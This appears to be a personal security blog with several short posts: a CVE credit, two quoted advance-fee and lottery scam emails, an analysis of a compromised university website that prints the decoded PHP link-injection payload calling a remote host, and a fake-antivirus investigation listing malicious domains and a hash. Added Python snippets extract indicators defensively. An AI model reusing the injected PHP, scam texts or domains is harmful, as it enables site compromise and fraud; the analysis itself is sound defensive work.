Wednesday, June 2, 2010

First Vulnerability I Found: CVE-2010-2091

http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2010-2091

http://xforce.iss.net/xforce/xfdb/58835

http://www.securityfocus.com/archive/1/archive/1/511401/100/0/threaded

http://www.exploit-db.com/exploits/12728

Tuesday, May 11, 2010

SPAM Mails: Part 2

Following is a SPAM mail which most of us have received, and which many ended up replying to.

Dearest One,
Good a thing to write you. I have a proposal for you; this however is not
mandatory nor will I in any manner compels you to honour against your
will.

I am Aisha Al- Salam, 23years old and the only daughter of my late
parents Mr.and Mrs.Hassan Al-salam my father was a highly reputable
business magnet - (a cocoa merchant) who operated in the capital of Cote
D Ivorie during his days.

It is sad to say that he passed away mysteriously in France during one of
his business trips abroad year 12th.Febuary 2007. Though his sudden death
was linked or rather suspected to have been masterminded by an uncle of
his who travelled with him at that time. But God knows the truth! My
mother left me when I was just 4 years old, and since then my father took
me so special.

Before his death on February 12th 2007 he called his secretary who
accompanied him to the hospital and told him that he has the sum of 7.5
million, United States Dollars.(USD$7,500.000 ) left in one of the
Leading Bank in Cote D Ivorie and he deposited the money in my name in
the bank as the next kins.

I am just 23 years old and a university undergraduate and really don't
know what to do. Now I want a foreign partner overseas where I can
transfer this fund. This is because I have suffered a lot of set backs as
a result of incessant political crisis here in Cote D Ivorie . The death
of my father actually brought sorrow to my life.

Sir, I am in a sincere desire of your humble assistance in this
regards.Your suggestions and ideas will be highly regarded. Now permit me
to ask these few questions:-

1. Can you honestly help me as your daughter?
2. Can I completely trust you?
I have decided to offer you 30% of the total amount for your willingness
to help me, Please kindly response to my mail immediately with your full
personal information, telephone number so that I can call and speak with
you on the telephone.

Please, consider this and get back to me as soon as possible.

Thank you so much.
Insallah .

My sincere regards,
Ms Aisha Al Salam.

SPAM Mails: Part 1

Below is a SPAM mail which I received in my inbox. To make it look realistic, the spammers went one step further and provided contact numbers and a few images to entice users into giving up their personal information.

FROM THE DESK OF THE DIRECTOR:
UK INTERNATIONAL LOTTERY PRIZE AWARD DEPT

WINNING NOTIFICATION FOR CATEGORY "A" WINNER ONLY

Amount Won: £1,000,000.00 Pounds

Dear Lucky winner,

We are glad to inform you that you have won a prize money of One Million
Great Britain Pound Sterlings (£1,000,000.00) in our last lottery promotional
draw.

We are pleased to inform you of the final announcement of the result in
UK INTERNATIONAL LOTTERY PRIZE AWARD DEPT. Your email address was selected by our Electronic Random Selection System (ERSS) from an exclusive list of e-mail addresses of individual and corporate bodies. No tickets were sold.

With Ref.Number: GP 14-M-246-04,
Batch Number: 573881545-UK/2010
Ticket Number: PP3502/8707-01.

CONGRATULATIONS!!!:
To file for Your Claims Please contact.
********************************************
Name: MR JOSEPH POUNCH
Tel:+447014275315
Email:
josephpounch18@gmail.com
*******************************************
However you will have to fill and submit this form to the events manager for
verification & direction on how you canclaim your winning fund.
Fill the Details Below:
1. Full name...............
2. Contact Address......
3. Age.........................
4. Mobile Number.........
5. Marital Status..........
6. Sex.........................
7. Occupation..............
8. Company................
9.State:......................
10.Country..................
11.Nationality...............
12.Address.................
13.Valid ID Proof (Send as email attachment)
Your Reference and Batch number at the top of this mail:

Mrs Vivian Jones.
Lottery Coordinator

Many netizens fall prey to this and end up providing their information. The details requested above can then be used to make intelligent guesses at passwords.

Before providing information in reply to such mails, think once: "who the hell in this world is going to give away free money!!!"

Friday, October 9, 2009

Premier University of Andhra Pradesh Serving Malware.

A couple of days back I reported the infection to a few security researchers through OWASP. Now Firefox and Google say the same!! If you visit http://www.nagarjunauniversity.ac.in/, the Firefox browser alerts you with the following warning:

Another way to confirm whether it is serving malicious pages or malware: type "nagarjunauniversity" into the Google search box and open the first link.

Google's description of the pages hosted by www.nagarjunauniversity.ac.in is:

Real-time view of the malicious pages and analysis
Visiting the site greets you with script execution (see the diagram below).
Viewing the source of this page will make you think for a while: why are Chinese and Russian links present in the page?? Have a glimpse of the code.


When I reported the incident on OWASP, base64-encoded code was present on this page. Don't worry, the code is still present, but on other pages. When I was writing this blog, base64-encoded content was present on the following pages, among many others:
http://www.nagarjunauniversity.ac.in/administration.asp
http://www.nagarjunauniversity.ac.in/downloads.asp
The source code of either page looks like this:
If you observe carefully you can see a site which is partially percent-encoded (URL encoding):
http%3A%2F%2Fbale.ws%2Fshow.php (which decodes to http://bale.ws/show.php)
Google's description mentioned the bale.ws domain.
When we open the above site it redirects to
http://superpupermegacasino.com/ which hosts *SmartDownload.exe*

VirusTotal identifies the EXE as *Win32/CasOnline!Adware*. Further details about the binary can be found at
http://www.virustotal.com/analisis/9709a6f32be02642671f96ee264bae85fc924072ceb1a6f07c94ab94ae77943d-1254763534

Well, decoding the base64 content with the base64_decode() call present in the malicious page gives the script below, which is passed as an argument to eval(); eval() then executes it:

// Decoded payload handed to eval(). It silences all PHP errors, then injects whatever
// HTML the remote server returns for this host: a hidden link-spam / cloaking script.
error_reporting(0);

$links = new GetLinks();

echo $links->Links;

class GetLinks
{
    var $host = "esli.tw";              // remote server that hands out the links
    var $path = "/link.php?site=";      // request path; the infected host name is appended
    var $site = "";
    var $user_agent = "";               // collected but never sent in the request

    var $Links = "";                    // HTML fetched from the remote server

    var $_socket_timeout = 12;
    var $_cashe_life_time = 3600;       // re-fetch at most once an hour
    var $_cashe_file = "cashe.txt";     // local cache of the fetched links

    // PHP4-style constructor: use the cache while it is fresh, otherwise fetch and rewrite it.
    function GetLinks()
    {
        if (!is_file($this->_cashe_file) || (filemtime($this->_cashe_file) < (time() - $this->_cashe_life_time)) || filesize($this->_cashe_file) == 0) {
            // The infected site's own host name is reported to the remote server
            $this->site = isset($_SERVER['HTTP_HOST']) ? $_SERVER['HTTP_HOST'] : $HTTP_SERVER_VARS['HTTP_HOST'];
            $this->user_agent = $_SERVER['HTTP_USER_AGENT'];

            $this->Links = $this->fetch_remote_file();
            if ($handle = fopen($this->_cashe_file, 'w')) {
                fwrite($handle, $this->Links);
                fclose($handle);
            }
        }
        else {
            $this->Links = file_get_contents($this->_cashe_file);
        }
    }

    // Raw HTTP/1.1 GET over a plain socket; returns the response body (everything after the headers).
    function fetch_remote_file()
    {
        $buff = '';
        $fp = fsockopen($this->host, 80, $errno, $errstr, $this->_socket_timeout);
        if (!$fp) {
            return '';                  // remote server unreachable: nothing to inject
        } else {
            $out = "GET {$this->path}{$this->site} HTTP/1.1\r\n";
            $out .= "Host: {$this->host}\r\n";
            $out .= "Connection: Close\r\n\r\n";

            fwrite($fp, $out);
            while (!feof($fp)) {
                $buff .= fgets($fp, 128);
            }
            fclose($fp);
            $page = explode("\r\n\r\n", $buff);   // split headers from body
            return $page[1];
        }
    }
}
I am not sure what cashe.txt does or what its contents are!
The HTML tag responsible for executing the scripts, malware, etc. is IFRAME.
The next blog post will most probably be a binary analysis of SmartDownload.exe. Safe surfing!!!
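As an added example (not code from the original post), a small Python triage script that pulls the three indicator types discussed above out of a page's source: eval(base64_decode("...")) wrappers (decoded and searched for the remote host they call), hidden IFRAME sources, and percent-encoded URLs. The sample page it runs on is constructed here, not the real university page.

```python
import base64
import re
from urllib.parse import unquote

# Patterns seen in the injected pages: an eval(base64_decode("...")) wrapper,
# IFRAME tags, and percent-encoded URLs such as http%3A%2F%2Fbale.ws%2Fshow.php
EVAL_B64 = re.compile(r"""eval\s*\(\s*base64_decode\s*\(\s*['"]([A-Za-z0-9+/=\s]+)['"]""", re.I)
IFRAME_SRC = re.compile(r"""<iframe[^>]*\bsrc\s*=\s*['"]?([^'"\s>]+)""", re.I)
PCT_URL = re.compile(r"https?%3A%2F%2F[A-Za-z0-9%._~-]+", re.I)
HOST_LITERAL = re.compile(r"""(?:\$host\s*=\s*|https?://)['"]?([a-z0-9.-]+\.[a-z]{2,})""", re.I)

def decode_payload(b64: str) -> str:
    """Decode the eval'd blob, tolerating embedded whitespace and missing '=' padding."""
    raw = re.sub(r"\s+", "", b64)
    raw += "=" * (-len(raw) % 4)
    return base64.b64decode(raw).decode("latin-1")

def find_indicators(source: str) -> dict:
    """Return the hidden indicators a defender would pull from one page's HTML source."""
    payloads = [decode_payload(m) for m in EVAL_B64.findall(source)]
    hosts = set()
    for p in payloads:
        hosts.update(h.lower() for h in HOST_LITERAL.findall(p))
    return {
        "eval_base64_count": len(payloads),
        "payload_hosts": sorted(hosts),
        "iframes": IFRAME_SRC.findall(source),
        "percent_encoded_urls": [unquote(u) for u in PCT_URL.findall(source)],
        "suspicious": bool(payloads or IFRAME_SRC.search(source)),
    }

# Constructed sample page: a hidden IFRAME, a percent-encoded redirector URL and a
# base64 wrapper around a cut-down version of the link-fetching script shown above.
_INNER_PHP = 'error_reporting(0); $host = "esli.tw"; $path = "/link.php?site=";'
_B64 = base64.b64encode(_INNER_PHP.encode()).decode()
SAMPLE_PAGE = f"""<html><body>
<h1>Welcome</h1>
<iframe src="http://bale.ws/show.php" width="0" height="0" style="display:none"></iframe>
<script>var u = "http%3A%2F%2Fbale.ws%2Fshow.php";</script>
<?php eval(base64_decode("{_B64}")); ?>
</body></html>"""

if __name__ == "__main__":
    for key, val in find_indicators(SAMPLE_PAGE).items():
        print(f"{key}: {val}")
```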

Friday, September 4, 2009

Personal Antivirus: antimalwarescanner8.com/ best-antivirus8.com/ hqvirusscanner.com/ advancedpcscanner3.com

I typed my search keywords into Google and clicked on a few links on the first page of results. One site caught my interest because it was redirecting me to another site; the malicious web page doing the redirect was embedded with an unnoticeable Flash file named intro.swf. The web page on the redirected site welcomes you with a pop-up window saying "Warning!!! Your system.......". The pop-up warning window is similar across all the malicious domains.
If you click OK or the Cross (X)/Close button it takes you to a fake scanning page depicting a real anti-virus scan of the PC.
After the scan it gives the scan results shown in the figure below, depicting a real anti-virus scan and stating that various directories on the PC are infected with trojans.
It asks the user to download "Personal Antivirus" to protect their PC.
Clicking anywhere on this page gives a pop-up window to download the anti-virus binary.
If you click on the page multiple times it pops up multiple windows for downloading the
Antivirus-[a-f0-9]{3,7}_2031.exe file. Doing "View Source" on the above page shows a few interesting JavaScript files.
The contents of listfile.js were interesting because it had an array of various file names with EXE, HLP, DLL etc. extensions.
I downloaded several different binary samples, but all the files had the same MD5 value. Surprising!!!
I tried to execute the sample on VMware with MS Windows XP SP2 installed. It gives the following memory access error on the VM. Is it detecting the VM environment?!!
I executed the same sample on MS Windows Server 2003 Standard Edition with SP2 but was not able to run the sample successfully.
Don't try to access domains with the URI
http://maliciousdomain.com/1/?sess=p2T4yjjxMi01JmlwPTY3Ljk3LjgwLjUmdGltZT0xMjU1MUAMPQZM

The sess parameter changes with every malicious domain. I was a little suspicious that the sess parameter's value was base64-encoded; decoding it to ASCII gives
§døÊ8ñ2-5&ip=67.97.80.5&time=12551@ = L
Wow!! It contains an IP Address.
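As an added example (not code from the original post), a Python analyser that performs the decoding described above on the sess value quoted from the post, extracts the key=value fields from the decoded bytes, and flags when the token carries the visitor's public IP address; the private-address token in the test is constructed.

```python
import base64
import binascii
import ipaddress
import re

# The sess value quoted in the post above (the post notes it differs per malicious domain).
SESS_FROM_POST = "p2T4yjjxMi01JmlwPTY3Ljk3LjgwLjUmdGltZT0xMjU1MUAMPQZM"

def decode_tracking_param(value: str) -> bytes:
    """Base64-decode a URL token, accepting the URL-safe alphabet and stripped '=' padding."""
    raw = value.strip().replace("-", "+").replace("_", "/")
    raw += "=" * (-len(raw) % 4)
    try:
        return base64.b64decode(raw, validate=True)
    except binascii.Error:
        return b""   # not base64 at all; the caller treats it as opaque

def extract_fields(blob: bytes) -> dict:
    """Pull key=value pairs out of the decoded bytes, skipping the binary bytes around them."""
    text = blob.decode("latin-1")   # 1:1 byte mapping, so binary junk never raises
    # values are limited to URL-token characters so trailing control bytes are not swallowed
    return dict(re.findall(r"([A-Za-z_]+)=([A-Za-z0-9.:_-]*)", text))

def analyse_sess(value: str) -> dict:
    """Decode one sess token and report whether it leaks the visitor's public IP address."""
    blob = decode_tracking_param(value)
    fields = extract_fields(blob)
    try:
        leaks_ip = ipaddress.ip_address(fields.get("ip", "")).is_global
    except ValueError:
        leaks_ip = False
    printable = sum(32 <= b < 127 for b in blob)
    return {
        "decoded_length": len(blob),
        "fields": fields,
        "leaks_public_ip": leaks_ip,
        "printable_ratio": round(printable / len(blob), 2) if blob else 0.0,
    }

if __name__ == "__main__":
    print(analyse_sess(SESS_FROM_POST))
```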

Malicious Domains:
hqvirusscanner.com
antimalwarescanner8.com
advancedpcscanner3.com
best-antivirus8.com
antivirus-fast-scan04.com
(new domains might come up soon)
File Names: Antivirus_[a-z0-9]{3,7}.exe, Antivirus-[a-f0-9]{3,7}_2031.exe
File Size: 163840 bytes
MD5: 22fb04afad00ccaeda1f5e5892493d77
Malware Type: Browser Hijackers
Threat Level: High

  • The file is packed with an unknown packer.
  • PEiD doesn't give any packer name.
  • OllyDbg throws an exception while loading the file.
  • It imports a few APIs from KERNEL32.DLL.
VirusTotal results can be found at
http://www.virustotal.com/analisis/6a761c86645ca3b8b808a80f330ffb315dc5c175089abf7f8ff9ea2ddbbc57b2-1252076765

If I manage to run the malicious file successfully, I will post a new blog. Be cautious while surfing the net and when you come across pop-ups!!

Sunday, August 9, 2009

Hello MicroSoft...Is SCRIPT Execution Really Safe?!!

I was editing the browser settings in IE7 to allow script/applet execution. After saving the configuration I accessed a site which has an applet. As expected, the browser gave an error message saying "Your security settings do not allow websites to use ActiveX controls installed on your computer. This page may not display correctly. Click here for options..."


But......observe the pop-up window............!!
Scripts are usually safe.......Micro$$$$oft feels that SCRIPT execution is safe!!!


The version details of my browser, IE7, are:
Version: 7.0.5730.13
Product ID: 92319-600-1753032-45410
Update Versions: 0

For "Happy Browsing" use Firefox.